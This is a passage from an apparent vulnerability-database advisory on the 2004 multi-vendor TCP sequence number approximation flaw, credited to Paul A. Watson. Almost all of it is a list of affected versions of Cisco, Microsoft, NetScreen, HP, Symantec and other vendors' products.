Multiple Vendor TCP Sequence Number Approximation Vulnerability
Design Error 10183
Yes No
2004-04-20 12:00:00 2008-01-08 07:29:00
Discovery is credited to Paul A. Watson.

- 受影响的程序版本

Symantec VelociRaptor 1300 1.5
Symantec VelociRaptor 1200 1.5
Symantec VelociRaptor 1100 1.5
Symantec Nexland Pro800turbo Firewall Appliance
Symantec Nexland Pro800 Firewall Appliance
Symantec Nexland Pro400 Firewall Appliance
Symantec Nexland Pro100 Firewall Appliance
Symantec Nexland ISB SOHO Firewall Appliance
Symantec Gateway Security 5400 2.0.1
Symantec Gateway Security 5400 2.0
Symantec Gateway Security 5310 1.0
Symantec Gateway Security 5300 1.0
Symantec Gateway Security 460R
Symantec Gateway Security 460
Symantec Gateway Security 440
Symantec Gateway Security 420 0
Symantec Gateway Security 360R 2.1 Build 415
Symantec Gateway Security 360R 2.1 Build 300
Symantec Gateway Security 360R
Symantec Gateway Security 360
Symantec Gateway Security 320
Symantec Firewall/VPN Appliance 200R
Symantec Firewall/VPN Appliance 200
Symantec Firewall/VPN Appliance 100
Symantec Enterprise Firewall 8.0 Solaris
Symantec Enterprise Firewall 8.0 NT/2000
Symantec Enterprise Firewall 7.0.4 Solaris
Symantec Enterprise Firewall 7.0.4 NT/2000
Symantec Enterprise Firewall 7.0 Solaris
Symantec Enterprise Firewall 7.0 NT/2000
SGI IRIX 6.5.25
SGI IRIX 6.5.24
SGI IRIX 6.5.23
SGI IRIX 6.5.22
SEIL Turbo 1.18
SEIL neu T1 ("Ver.2" series) 2.21
SEIL neu T1 ("Ver.1" series) 1.89
SEIL neu ATM 1.35
SEIL neu 2FE Plus 1.9
SEIL neu 2FE ("Ver.2" series) 2.21
SEIL neu 2FE ("Ver.1" series) 1.89
SEIL neu 128 ("Ver.2" series) 2.21
SEIL neu 128 ("Ver.1" series) 1.89
SCO Unixware 7.1.3
SCO Unixware 7.1.1
SCO Open Server 5.0.7
SCO Open Server 5.0.6
NetScreen ScreenOS 5.0
NetScreen ScreenOS 4.0.3 r4
NetScreen ScreenOS 4.0.3 r3
NetScreen ScreenOS 4.0.3 r2
NetScreen ScreenOS 4.0.3 r1
NetScreen ScreenOS 4.0.3
NetScreen ScreenOS 4.0.2
NetScreen ScreenOS 4.0.1 r9
NetScreen ScreenOS 4.0.1 r8
NetScreen ScreenOS 4.0.1 r7
NetScreen ScreenOS 4.0.1 r6
NetScreen ScreenOS 4.0.1 r5
NetScreen ScreenOS 4.0.1 r4
NetScreen ScreenOS 4.0.1 r3
NetScreen ScreenOS 4.0.1 r2
NetScreen ScreenOS 4.0.1 r10
NetScreen ScreenOS 4.0.1 r1
NetScreen ScreenOS 4.0.1
NetScreen ScreenOS 4.0 r9
NetScreen ScreenOS 4.0 r8
NetScreen ScreenOS 4.0 r7
NetScreen ScreenOS 4.0 r6
NetScreen ScreenOS 4.0 r5
NetScreen ScreenOS 4.0 r4
NetScreen ScreenOS 4.0 r3
NetScreen ScreenOS 4.0 r2
NetScreen ScreenOS 4.0 r12
NetScreen ScreenOS 4.0 r11
NetScreen ScreenOS 4.0 r10
NetScreen ScreenOS 4.0 r1
NetScreen ScreenOS 4.0 -DIAL
NetScreen ScreenOS 4.0
NetScreen ScreenOS 3.1.1 r2
NetScreen ScreenOS 3.1 r9
NetScreen ScreenOS 3.1 r8
NetScreen ScreenOS 3.1 r7
NetScreen ScreenOS 3.1 r6
NetScreen ScreenOS 3.1 r5
NetScreen ScreenOS 3.1 r4
NetScreen ScreenOS 3.1 r3
NetScreen ScreenOS 3.1 r2
NetScreen ScreenOS 3.1 r12
NetScreen ScreenOS 3.1 r11
NetScreen ScreenOS 3.1 r10
NetScreen ScreenOS 3.1 r1
NetScreen ScreenOS 3.1
NetScreen ScreenOS 3.0.3 r8
NetScreen ScreenOS 3.0.3 r7
NetScreen ScreenOS 3.0.3 r6
NetScreen ScreenOS 3.0.3 r5
NetScreen ScreenOS 3.0.3 r4
NetScreen ScreenOS 3.0.3 r3
NetScreen ScreenOS 3.0.3 r2
NetScreen ScreenOS 3.0.3 r1.1
NetScreen ScreenOS 3.0.3 r1
NetScreen ScreenOS 3.0.3
NetScreen ScreenOS 3.0.2
NetScreen ScreenOS 3.0.1 r7
NetScreen ScreenOS 3.0.1 r6
NetScreen ScreenOS 3.0.1 r5
NetScreen ScreenOS 3.0.1 r4
NetScreen ScreenOS 3.0.1 r3
NetScreen ScreenOS 3.0.1 r2
NetScreen ScreenOS 3.0.1 r1
NetScreen ScreenOS 3.0.1
NetScreen ScreenOS 3.0 r4
NetScreen ScreenOS 3.0 r3
NetScreen ScreenOS 3.0 r2
NetScreen ScreenOS 3.0 r1
NetScreen ScreenOS 3.0
NetScreen ScreenOS 2.10 r4
NetScreen ScreenOS 2.10 r3
NetScreen ScreenOS 2.8 r1
NetScreen ScreenOS 2.8
NetScreen ScreenOS 2.7.1 r3
NetScreen ScreenOS 2.7.1 r2
NetScreen ScreenOS 2.7.1 r1
NetScreen ScreenOS 2.7.1
NetScreen ScreenOS 2.6.1 r9
NetScreen ScreenOS 2.6.1 r8
NetScreen ScreenOS 2.6.1 r7
NetScreen ScreenOS 2.6.1 r6
NetScreen ScreenOS 2.6.1 r5
NetScreen ScreenOS 2.6.1 r4
NetScreen ScreenOS 2.6.1 r3
NetScreen ScreenOS 2.6.1 r2
NetScreen ScreenOS 2.6.1 r12
NetScreen ScreenOS 2.6.1 r11
NetScreen ScreenOS 2.6.1 r10
NetScreen ScreenOS 2.6.1 r1
NetScreen ScreenOS 2.6.1
NetScreen ScreenOS 2.6
NetScreen ScreenOS 2.5 r6
NetScreen ScreenOS 2.5 r2
NetScreen ScreenOS 2.5 r1
NetScreen ScreenOS 2.5
NetScreen ScreenOS 2.1 r7
NetScreen ScreenOS 2.1 r6
NetScreen ScreenOS 2.1
NetScreen ScreenOS 2.0.1 r8
NetScreen ScreenOS 1.73 r2
NetScreen ScreenOS 1.73 r1
NetScreen ScreenOS 1.66 r2
NetScreen ScreenOS 1.66
NetScreen ScreenOS 1.64
NetScreen ScreenOS 1.7
NetBSD NetBSD 2.0
NetBSD NetBSD 1.6.2
NetBSD NetBSD 1.6.1
NetBSD NetBSD 1.6 beta
NetBSD NetBSD 1.6
NetBSD NetBSD 1.5.3
NetBSD NetBSD 1.5.2
NetBSD NetBSD 1.5.1
NetBSD NetBSD 1.5
Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Tablet PC Edition SP1
Microsoft Windows XP Tablet PC Edition
Microsoft Windows XP Professional x64 Edition
Microsoft Windows XP Professional SP2
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows XP Media Center Edition
Microsoft Windows XP Home SP2
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows XP Embedded SP1
Microsoft Windows XP Embedded
Microsoft Windows XP 64-bit Edition Version 2003
Microsoft Windows XP 0
Microsoft Windows Server 2003 Web Edition SP1
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard x64 Edition
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise x64 Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter x64 Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition SP1
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Juniper Networks T-series Router T640
Juniper Networks T-series Router T320
Juniper Networks M-series Router M5
Juniper Networks M-series Router M40e
Juniper Networks M-series Router M40
Juniper Networks M-series Router M20
Juniper Networks M-series Router M160
Juniper Networks M-series Router M10
Juniper Networks E-series Router
InterNiche NicheStack 2.0
InterNiche NicheLite 2.0
IETF RFC 793: TCP
IETF RFC 1323: TCP Extensions for High Performance
IBM AIX 5.3 L
IBM AIX 5.2 L
IBM AIX 5.1 L
IBM AIX 5.3
IBM AIX 5.2
IBM AIX 5.1
HP Tru64 5.1 B-2 PK4
HP Tru64 5.1 B PK4
HP Tru64 5.1 B PK3
HP Tru64 5.1 A PK6
HP Tru64 4.0 G PK4
HP Tru64 4.0 F PK8 (BL22)
HP Tru64 4.0 F PK8
HP ProCurve Switch 9315M
HP ProCurve Switch 9308M
HP ProCurve Switch 9304M
HP Procurve Switch 8000M
HP ProCurve Switch 5372XL J4848A
HP ProCurve Switch 5348XL J4849A
HP ProCurve Switch 5308XL J4819A
HP ProCurve Switch 5304XL J4850A
HP Procurve Switch 4108GL-bundle
HP ProCurve Switch 4108GL J4865A
HP Procurve Switch 4108GL
HP ProCurve Switch 4000M J4121A
HP Procurve Switch 4000M
HP Procurve Switch 2525
HP ProCurve Switch 2524 J4813A
HP Procurve Switch 2524
HP Procurve Switch 2512
HP ProCurve Switch 2424M J4093A
HP Procurve Switch 2424M
HP ProCurve Switch 2400M J4122A
HP Procurve Switch 2400M
HP Procurve Switch 1600M
HP EtherTwist
HP Advancestack Switch 800T J3245A
HP AdvanceStack 10Base-T Switching Hub J3210A A.03.07
HP AdvanceStack 10Base-T Switching Hub J3205A A.03.07
HP AdvanceStack 10Base-T Switching Hub J3204A A.03.07
HP AdvanceStack 10Base-T Switching Hub J3203A A.03.07
HP AdvanceStack 10Base-T Switching Hub J3202A A.03.07
HP AdvanceStack 10Base-T Switching Hub J3201A A.03.07
HP AdvanceStack 10Base-T Switching Hub J3200A A.03.07
Cray UNICOS/mp 2.3
Cray UNICOS/mp
Cray UNICOS/mk 2.0.5 .54
Cray UNICOS/mk 1.5.1
Cray UNICOS/mk 1.5
Cray UNICOS MAX 1.3 .5
Cray UNICOS MAX 1.3
Cray UNICOS 9.2 .4
Cray UNICOS 9.2
Cray UNICOS 9.0.2 .5
Cray UNICOS 9.0
Cray UNICOS 8.3
Cray UNICOS 8.0
Cray UNICOS 7.0
Cray UNICOS 6.1
Cray UNICOS 6.0 E
Cray UNICOS 6.0
Cisco ws-x6624
Cisco ws-x6608
Cisco Wireless Lan Solution Engine
Cisco Wireless LAN Solution Appliance
Cisco WGB340
Cisco WAN Manager
Cisco VPN 5008 Concentrator
Cisco VPN 5002 Concentrator
Cisco VPN 5001 Concentrator
Cisco Voice Manager
Cisco VG248 Analog Phone Gateway
Cisco User Registration Tool VLAN Policy Server
Cisco Unity Server 4.0
Cisco Unity Server 3.3
Cisco Unity Server 3.2
Cisco Unity Server 3.1
Cisco Unity Server 3.0
Cisco Unity Server 2.46
Cisco Unity Server 2.4
Cisco Unity Server 2.3
Cisco Unity Server 2.2
Cisco Unity Server 2.1
Cisco Unity Server 2.0
Cisco Unity Server
Cisco Traffic Director
Cisco SwitchProbe 5.1
Cisco SwitchProbe 4.7
Cisco SwitchProbe 4.6
Cisco SwitchProbe 4.5
Cisco SwitchProbe 4.2
Cisco SwitchProbe 4.1
Cisco SwitchProbe 3.1
Cisco SN5400 series storage routers
Cisco SN 5428 Storage Router SN5428-3.3.2-K9
Cisco SN 5428 Storage Router SN5428-3.3.1-K9
Cisco SN 5428 Storage Router SN5428-3.2.2-K9
Cisco SN 5428 Storage Router SN5428-3.2.1-K9
Cisco SN 5428 Storage Router SN5428-2.5.1-K9
Cisco SN 5428 Storage Router SN5428-2-3.3.2-K9
Cisco SN 5428 Storage Router SN5428-2-3.3.1-K9
Cisco SN 5420 Storage Router 1.1.3
Cisco SN 5420 Storage Router 1.1 (7)
Cisco SN 5420 Storage Router 1.1 (5)
Cisco SN 5420 Storage Router 1.1 (4)
Cisco SN 5420 Storage Router 1.1 (3)
Cisco SN 5420 Storage Router 1.1 (2)
Cisco Secure PIX Firewall
Cisco Secure Intrusion Detection System (NetRanger) 0
Cisco RTM
Cisco PIX Firewall 6.3.1
Cisco PIX Firewall 6.3 (3.109)
Cisco PIX Firewall 6.3 (3.102)
Cisco PIX Firewall 6.3 (1)
Cisco PIX Firewall 6.3
Cisco PIX Firewall 6.2.3
Cisco PIX Firewall 6.2.2 .111
Cisco PIX Firewall 6.2.2
Cisco PIX Firewall 6.2.1
Cisco PIX Firewall 6.2 (3.100)
Cisco PIX Firewall 6.2 (3)
Cisco PIX Firewall 6.2 (2)
Cisco PIX Firewall 6.2 (1)
Cisco PIX Firewall 6.2
Cisco PIX Firewall 6.1.5
Cisco PIX Firewall 6.1.4
Cisco PIX Firewall 6.1.3
Cisco PIX Firewall 6.1 (5)
Cisco PIX Firewall 6.1 (4)
Cisco PIX Firewall 6.1 (3)
Cisco PIX Firewall 6.1 (2)
Cisco PIX Firewall 6.1 (1)
Cisco PIX Firewall 6.1
+ Cisco PIX Firewall 515
+ Cisco PIX Firewall 520
Cisco PIX Firewall 6.0.4
Cisco PIX Firewall 6.0.3
Cisco PIX Firewall 6.0 (4.101)
Cisco PIX Firewall 6.0 (4)
Cisco PIX Firewall 6.0 (2)
Cisco PIX Firewall 6.0 (1)
Cisco PIX Firewall 6.0
Cisco Parallel Channel Port Adapter (PCPA)
Cisco ONS 15863 T31 Submarine WDM System
Cisco ONS 15832 T31 DWDM System
Cisco ONS 15831 T31 DWDM System
Cisco ONS 15830 T30 Optical Amplification System
Cisco ONS 15808 Dense Wave Division MuX Platform
Cisco ONS 15801 Dense Wave Division MuX Platform
Cisco ONS 15800 Dense Wave Division MuX Platform
Cisco ONS 15532 T31 OMDS Metro WDM System
Cisco ONS 15531 T31 OMDS Metro WDM System
Cisco ONS 15454 Optical Transport Platform 4.1 (3)
Cisco ONS 15454 Optical Transport Platform 4.1 (2)
Cisco ONS 15454 Optical Transport Platform 4.1 (1)
Cisco ONS 15454 Optical Transport Platform 4.1 (0)
Cisco ONS 15454 Optical Transport Platform 4.1
Cisco ONS 15454 Optical Transport Platform 4.0 (2)
Cisco ONS 15454 Optical Transport Platform 4.0 (1)
Cisco ONS 15454 Optical Transport Platform 4.0
Cisco ONS 15454 Optical Transport Platform 3.4
Cisco ONS 15454 Optical Transport Platform 3.3
Cisco ONS 15454 Optical Transport Platform 3.2 .0
Cisco ONS 15454 Optical Transport Platform 3.1 .0
Cisco ONS 15454 Optical Transport Platform 3.0
Cisco ONS 15327 4.1 (3)
Cisco ONS 15327 4.1 (2)
Cisco ONS 15327 4.1 (1)
Cisco ONS 15327 4.1 (0)
Cisco ONS 15327 4.0 (2)
Cisco ONS 15327 4.0 (1)
Cisco ONS 15327 4.0
Cisco ONS 15327 3.4
Cisco ONS 15327 3.3
Cisco ONS 15327 3.2
Cisco ONS 15327 3.1
Cisco ONS 15327 3.0
Cisco ONS 15194 IP Transport Concentrator
Cisco ONS 15190 IP Transport Concentrator
Cisco MicroSwitch 1548
Cisco MicroSwitch 1538
Cisco MicroHub 1500
Cisco MGX-8850 R2
Cisco MGX-8850 R1
Cisco MGX-8260
Cisco MGX-8240
Cisco MGX-8220
Cisco MGX 8850 - PXM1 1.2.11
Cisco MGX 8850 - PXM1 1.2.10
Cisco MGX 8850 - PXM1 1.2.10
Cisco MGX 8850
Cisco MGX 8830
Cisco MGX 8250 1.2.11
Cisco MGX 8250 1.2.10
Cisco MGX 8250 1.2.10
Cisco MGX 8230 1.2.11
Cisco MGX 8230 1.2.10
Cisco MGX 8230 1.2.10
Cisco MGX
Cisco ME1100
Cisco MDS 9000 2.0 (0.86)
Cisco MDS 9000 1.3 (3.33)
Cisco MDS 9000
Cisco Local Director
Cisco LightStream 1010
Cisco LightStream 100 ATM Switches
Cisco IP/TV Server
Cisco IP Phone 7960
Cisco IP Phone 7940
Cisco IP Phone 7905
Cisco IOS 12.3XQ
Cisco IOS 12.3XN
Cisco IOS 12.3XM
Cisco IOS 12.3XL
Cisco IOS 12.3XK
Cisco IOS 12.3XJ
Cisco IOS 12.3XI
Cisco IOS 12.3XH
Cisco IOS 12.3XG
Cisco IOS 12.3XF
Cisco IOS 12.3XE
Cisco IOS 12.3XD
Cisco IOS 12.3XC
Cisco IOS 12.3XB
Cisco IOS 12.3XA
Cisco IOS 12.3T
Cisco IOS 12.3BW
Cisco IOS 12.3B
Cisco IOS 12.3
Cisco IOS 12.2ZP
Cisco IOS 12.2ZN
Cisco IOS 12.2ZL
Cisco IOS 12.2ZK
Cisco IOS 12.2ZJ
Cisco IOS 12.2ZI
Cisco IOS 12.2ZH
Cisco IOS 12.2ZG
Cisco IOS 12.2ZF
Cisco IOS 12.2ZE
Cisco IOS 12.2ZD
Cisco IOS 12.2ZC
Cisco IOS 12.2ZB
Cisco IOS 12.2ZA
Cisco IOS 12.2YZ
Cisco IOS 12.2YY
Cisco IOS 12.2YX
Cisco IOS 12.2YW
Cisco IOS 12.2YV
Cisco IOS 12.2YU
Cisco IOS 12.2YT
Cisco IOS 12.2YS
Cisco IOS 12.2YR
Cisco IOS 12.2YQ
Cisco IOS 12.2YP
Cisco IOS 12.2YO
Cisco IOS 12.2YN
Cisco IOS 12.2YM
Cisco IOS 12.2YL
Cisco IOS 12.2YK
Cisco IOS 12.2YJ
Cisco IOS 12.2YH
Cisco IOS 12.2YG
Cisco IOS 12.2YF
Cisco IOS 12.2YE
Cisco IOS 12.2YD
Cisco IOS 12.2YC
Cisco IOS 12.2YB
Cisco IOS 12.2YA
Cisco IOS 12.2XW
Cisco IOS 12.2XU
Cisco IOS 12.2XT
Cisco IOS 12.2XS
Cisco IOS 12.2XQ
Cisco IOS 12.2XN
Cisco IOS 12.2XM
Cisco IOS 12.2XL
Cisco IOS 12.2XK
Cisco IOS 12.2XJ
Cisco IOS 12.2XI
Cisco IOS 12.2XH
Cisco IOS 12.2XG
Cisco IOS 12.2XF
Cisco IOS 12.2XE
Cisco IOS 12.2XD
Cisco IOS 12.2XC
Cisco IOS 12.2XB
Cisco IOS 12.2XA
Cisco IOS 12.2T
Cisco IOS 12.2SZ
Cisco IOS 12.2SY
Cisco IOS 12.2SXB
Cisco IOS 12.2SXA
Cisco IOS 12.2SX
Cisco IOS 12.2SW
Cisco IOS 12.2SE
Cisco IOS 12.2S
Cisco IOS 12.2MC
Cisco IOS 12.2JA
Cisco IOS 12.2EW
Cisco IOS 12.2DX
Cisco IOS 12.2DD
Cisco IOS 12.2CX
Cisco IOS 12.2BZ
Cisco IOS 12.2BY
Cisco IOS 12.2BX
Cisco IOS 12.2BW
Cisco IOS 12.2BC
Cisco IOS 12.2B
Cisco IOS 12.2
Cisco IOS 12.1YJ
Cisco IOS 12.1YI
Cisco IOS 12.1YH
Cisco IOS 12.1YF
Cisco IOS 12.1YE
Cisco IOS 12.1YD
Cisco IOS 12.1YC
Cisco IOS 12.1YB
Cisco IOS 12.1YA
Cisco IOS 12.1XV
Cisco IOS 12.1XU
Cisco IOS 12.1XT
Cisco IOS 12.1XR
Cisco IOS 12.1XQ
Cisco IOS 12.1XP
Cisco IOS 12.1XM
Cisco IOS 12.1XL
Cisco IOS 12.1XJ
Cisco IOS 12.1XI
Cisco IOS 12.1XH
Cisco IOS 12.1XG
Cisco IOS 12.1XF
Cisco IOS 12.1XE
Cisco IOS 12.1XD
Cisco IOS 12.1XC
Cisco IOS 12.1XB
Cisco IOS 12.1XA
Cisco IOS 12.1T
Cisco IOS 12.1EY
Cisco IOS 12.1EX
Cisco IOS 12.1EW
Cisco IOS 12.1EV
Cisco IOS 12.1EU
Cisco IOS 12.1EO
Cisco IOS 12.1EC
Cisco IOS 12.1EB
Cisco IOS 12.1EA
Cisco IOS 12.1E
Cisco IOS 12.1DB
Cisco IOS 12.1DA
Cisco IOS 12.1AY
Cisco IOS 12.1AX
Cisco IOS 12.1AA
Cisco IOS 12.1(20)E2
Cisco IOS 12.1
Cisco IOS 12.0XV
Cisco IOS 12.0XU
Cisco IOS 12.0XS
Cisco IOS 12.0XR
Cisco IOS 12.0XQ
Cisco IOS 12.0XP
Cisco IOS 12.0XN
Cisco IOS 12.0XM
Cisco IOS 12.0XL
Cisco IOS 12.0XK
Cisco IOS 12.0XJ
Cisco IOS 12.0XI
Cisco IOS 12.0XH
Cisco IOS 12.0XG
Cisco IOS 12.0XE
Cisco IOS 12.0XD
Cisco IOS 12.0XC
Cisco IOS 12.0XB
Cisco IOS 12.0XA
Cisco IOS 12.0WX
Cisco IOS 12.0WT
Cisco IOS 12.0WC
Cisco IOS 12.0W5
Cisco IOS 12.0T
Cisco IOS 12.0SZ
Cisco IOS 12.0SX
Cisco IOS 12.0ST
Cisco IOS 12.0SL
Cisco IOS 12.0S
Cisco IOS 12.0DC
Cisco IOS 12.0DB
Cisco IOS 12.0DA
Cisco IOS 12.0
Cisco IOS 11.3
Cisco IOS 11.2SA
Cisco IOS 11.2P
Cisco IOS 11.2
Cisco IOS 11.1CC
Cisco IOS 11.1AA
Cisco IOS 11.1
Cisco Internet CDN Content Engine 7320
Cisco Internet CDN Content Engine 590
Cisco Intelligent Contact Manager 5.0
Cisco Intelligent Contact Manager
Cisco InfoCenter
Cisco IGX 8400
Cisco Hosting Solution Engine 1.3
Cisco Hosting Solution Engine 1.0
Cisco GSS 4490 Global Site Selector 0
Cisco GSS 4480 Global Site Selector
Cisco FastHub 400 1.0
Cisco FastHub 300
Cisco ESCON Channel Port Adapter (ECPA)
Cisco Element Management Framework
Cisco Device Fault Manager
Cisco CSS11800 Content Services Switch
Cisco CSS11500 Content Services Switch
Cisco CSS11150 Content Services Switch
Cisco CSS11050 Content Services Switch
Cisco CSS11000 Content Services Switch
Cisco CSM
Cisco CR-4430-B
Cisco Content Router 4450
Cisco Content Router 4430 4.1
Cisco Content Router 4430 4.0
Cisco Content Router 4430
Cisco Content Engine 7320 4.1
Cisco Content Engine 7320 4.0
Cisco Content Engine 7320 3.1
Cisco Content Engine 7320 2.2 .0
Cisco Content Engine 7320
Cisco Content Engine 590 4.1
Cisco Content Engine 590 4.0
Cisco Content Engine 590 3.1
Cisco Content Engine 590 2.2 .0
Cisco Content Engine 590
Cisco Content Engine 560 4.1
Cisco Content Engine 560 4.0
Cisco Content Engine 560 3.1
Cisco Content Engine 560 2.2 .0
Cisco Content Engine 560
Cisco Content Engine 507 4.1
Cisco Content Engine 507 4.0
Cisco Content Engine 507 3.1
Cisco Content Engine 507 2.2 .0
Cisco Content Engine 507
Cisco Content Distribution Manager 4670
Cisco Content Distribution Manager 4650 4.1
Cisco Content Distribution Manager 4650 4.0
Cisco Content Distribution Manager 4650
Cisco Content Distribution Manager 4630 4.1
Cisco Content Distribution Manager 4630 4.0
Cisco Content Distribution Manager 4630
Cisco Content Delivery Manager 4650
Cisco Content Delivery Manager 4630
Cisco CiscoWorks Windows 0
Cisco CiscoSecure ACS for Windows and Unix 0
Cisco CiscoSecure ACS 1111 Appliance
Cisco Channel Port Adapter (CPA)
Cisco Channel Interface Processor (CIP)
Cisco Catalyst 6500 Series SSL Services Module
Cisco Catalyst 6000 7.6 (1)
Cisco Catalyst 6000 7.5 (1)
Cisco Catalyst 6000 7.1 (2)
Cisco Catalyst 6000 7.1
Cisco Catalyst 6000 6.3 (4)
Cisco Catalyst 6000 6.3 (0.7)PAN
Cisco Catalyst 6000 6.2 (0.111)
Cisco Catalyst 6000 6.2 (0.110)
Cisco Catalyst 6000 6.1 (2.13)
Cisco Catalyst 6000 6.1 (1c)
Cisco Catalyst 6000 6.1 (1b)
Cisco Catalyst 6000 6.1 (1a)
Cisco Catalyst 6000 6.1 (1)
Cisco Catalyst 6000 5.5 (4b)
Cisco Catalyst 6000 5.5 (4a)
Cisco Catalyst 6000 5.5 (4)
Cisco Catalyst 6000 5.5 (3)
Cisco Catalyst 6000 5.5 (2)
Cisco Catalyst 6000 5.5 (13)
Cisco Catalyst 6000 5.5 (1)
Cisco Catalyst 6000 5.5
Cisco Catalyst 6000 5.4.1
Cisco Catalyst 6000 5.4 (4)
Cisco Catalyst 6000 5.4 (3)
Cisco Catalyst 6000 5.4 (2)
Cisco Catalyst 6000 5.4 (1)
Cisco Catalyst 6000 5.4
Cisco Catalyst 6000 5.3 (6)CSX
Cisco Catalyst 6000 5.3 (5a)CSX
Cisco Catalyst 6000 5.3 (5)CSX
Cisco Catalyst 6000 5.3 (4)CSX
Cisco Catalyst 6000 5.3 (3)CSX
Cisco Catalyst 6000 5.3 (2)CSX
Cisco Catalyst 6000 5.3 (1a)CSX
Cisco Catalyst 6000 5.3 (1)CSX
Cisco Catalyst 6000 3.1 (1a)WS-X6380-NAM
Cisco Catalyst 6000 3.1 (1a)WS-SVC-NAM-2
Cisco Catalyst 6000 3.1 (1a)WS-SVC-NAM-1
Cisco Catalyst 6000 2.2 (1a)WS-SVC-NAM-2
Cisco Catalyst 6000 2.2 (1a)WS-SVC-NAM-1
Cisco Catalyst 6000 2.1 (2)WS-X6380-NAM
Cisco Catalyst 5000 6.3 (4)
Cisco Catalyst 5000 6.1 (3)
Cisco Catalyst 5000 6.1 (2)
Cisco Catalyst 5000 6.1 (1c)
Cisco Catalyst 5000 6.1 (1b)
Cisco Catalyst 5000 6.1 (1a)
Cisco Catalyst 5000 6.1 (1)
Cisco Catalyst 5000 5.5 (7)
Cisco Catalyst 5000 5.5 (6)
Cisco Catalyst 5000 5.5 (4b)
Cisco Catalyst 5000 5.5 (4)
Cisco Catalyst 5000 5.5 (3)
Cisco Catalyst 5000 5.5 (2)
Cisco Catalyst 5000 5.5 (13)
Cisco Catalyst 5000 5.5 (1)
Cisco Catalyst 5000 5.4.1
Cisco Catalyst 5000 5.4 (4)
Cisco Catalyst 5000 5.4 (3)
Cisco Catalyst 5000 5.4 (2)
Cisco Catalyst 5000 5.4 (1)
Cisco Catalyst 5000 5.2 (4)
Cisco Catalyst 5000 5.2 (3)
Cisco Catalyst 5000 5.2 (2)
Cisco Catalyst 5000 5.2 (1)
Cisco Catalyst 5000 5.2
Cisco Catalyst 5000 5.1 (2a)
Cisco Catalyst 5000 5.1 (1)
Cisco Catalyst 5000 5.1
Cisco Catalyst 5000 4.5 (9)
Cisco Catalyst 5000 4.5 (8)
Cisco Catalyst 5000 4.5 (7)
Cisco Catalyst 5000 4.5 (6)
Cisco Catalyst 5000 4.5 (5)
Cisco Catalyst 5000 4.5 (4b)
Cisco Catalyst 5000 4.5 (4)
Cisco Catalyst 5000 4.5 (3)
Cisco Catalyst 5000 4.5 (2)
Cisco Catalyst 5000 4.5 (13a)
Cisco Catalyst 5000 4.5 (12)
Cisco Catalyst 5000 4.5 (11)
Cisco Catalyst 5000 4.5 (10)
Cisco Catalyst 5000
Cisco Catalyst 4000 7.6 (1)
Cisco Catalyst 4000 7.5 (1)
Cisco Catalyst 4000 7.1.2
Cisco Catalyst 4000 7.1 (2)
Cisco Catalyst 4000 7.1
Cisco Catalyst 4000 6.3.5
Cisco Catalyst 4000 6.3 (4)
Cisco Catalyst 4000 6.1 (1c)
Cisco Catalyst 4000 6.1 (1b)
Cisco Catalyst 4000 6.1 (1a)
Cisco Catalyst 4000 6.1 (1)
Cisco Catalyst 4000 5.5.5
Cisco Catalyst 4000 5.5 (4b)
Cisco Catalyst 4000 5.5 (4)
Cisco Catalyst 4000 5.5 (3)
Cisco Catalyst 4000 5.5 (2)
Cisco Catalyst 4000 5.5 (13)
Cisco Catalyst 4000 5.5 (1)
Cisco Catalyst 4000 5.5
Cisco Catalyst 4000 5.4.1
Cisco Catalyst 4000 5.4 (3)
Cisco Catalyst 4000 5.4 (2)
Cisco Catalyst 4000 5.4 (1)
Cisco Catalyst 4000 5.4
Cisco Catalyst 4000 5.2 (7)
Cisco Catalyst 4000 5.2 (6)
Cisco Catalyst 4000 5.2 (5)
Cisco Catalyst 4000 5.2 (4)
Cisco Catalyst 4000 5.2 (2)
Cisco Catalyst 4000 5.2 (1a)
Cisco Catalyst 4000 5.2 (1)
Cisco Catalyst 4000 5.2
Cisco Catalyst 4000 5.1 (2a)
Cisco Catalyst 4000 5.1 (1a)
Cisco Catalyst 4000 5.1 (1)
Cisco Catalyst 4000 5.1
Cisco Catalyst 4000 4.5 (9)
Cisco Catalyst 4000 4.5 (8)
Cisco Catalyst 4000 4.5 (7)
Cisco Catalyst 4000 4.5 (6)
Cisco Catalyst 4000 4.5 (5)
Cisco Catalyst 4000 4.5 (4b)
Cisco Catalyst 4000 4.5 (4)
Cisco Catalyst 4000 4.5 (3)
Cisco Catalyst 4000 4.5 (2)
Cisco Catalyst 4000 4.5 (10)
Cisco Catalyst 4000
Cisco Catalyst 3900
Cisco Catalyst 3000
Cisco Catalyst 29xx supervisor software 2.4.401
Cisco Catalyst 29xx supervisor software 2.1.1102
Cisco Catalyst 29xx supervisor software 2.1.6
Cisco Catalyst 29xx supervisor software 2.1.5 02
Cisco Catalyst 29xx supervisor software 2.1.5 01
Cisco Catalyst 29xx supervisor software 2.1.5
Cisco Catalyst 29xx supervisor software 1.0
Cisco Catalyst 2950
Cisco Catalyst 2948G-l3
